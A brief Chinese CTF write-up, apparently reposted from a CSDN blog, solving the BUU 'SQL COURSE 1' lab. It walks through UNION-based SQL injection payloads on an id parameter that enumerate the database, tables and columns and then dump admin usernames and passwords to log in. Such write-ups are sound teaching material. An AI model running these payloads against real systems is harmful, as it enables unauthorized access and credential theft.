BUU SQL COURSE 1

2023-12-13 03:29:48

四

发现有登录框，爆破半天也爆破不出来，只能从别的地方下手了

F12一下

发现了一个传参

进去发现id可以传参，sql注入一下试试

前三个都有回显，当id=4的时候页面没有回显了，正好验证了页面有三个新闻

当order by =3的时候又没有回显了，这时可以判断有2个字段

当我们查询显错位的时候，发现页面没有变化，考虑到是不是过滤了什么

?id=-1 union select 1,2

于是在传参点把1改为-1 就可以看到页面有回显了

?id=-1 union select 1,database()? 查库名

查表名

?id=-1 union select 1,table_name from information_schema.tables where table_schema='news'

查字段???id=-1 union select 1,column_name from information_schema.columns where table_name='admin'

这不是我们要的字段，我们要找的是username 和password

?id=-1 union select 1,column_name from information_schema.columns where table_name='admin' limit0,1

?id=-1 union select 1,column_name from information_schema.columns where table_name='admin' limit 2,1

查数据

?id=-1 union select 1,username from admin limit 0,1

?id=-1 union select 1,password?from admin limit 0,1

拿着账号密码去登录

登录成功 flag就出来了

文章来源:https://blog.csdn.net/qq_51802152/article/details/134805090
本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若内容造成侵权/违法违规/事实不符，请联系我的编程经验分享网邮箱：veading@qq.com进行投诉反馈，一经查实，立即删除！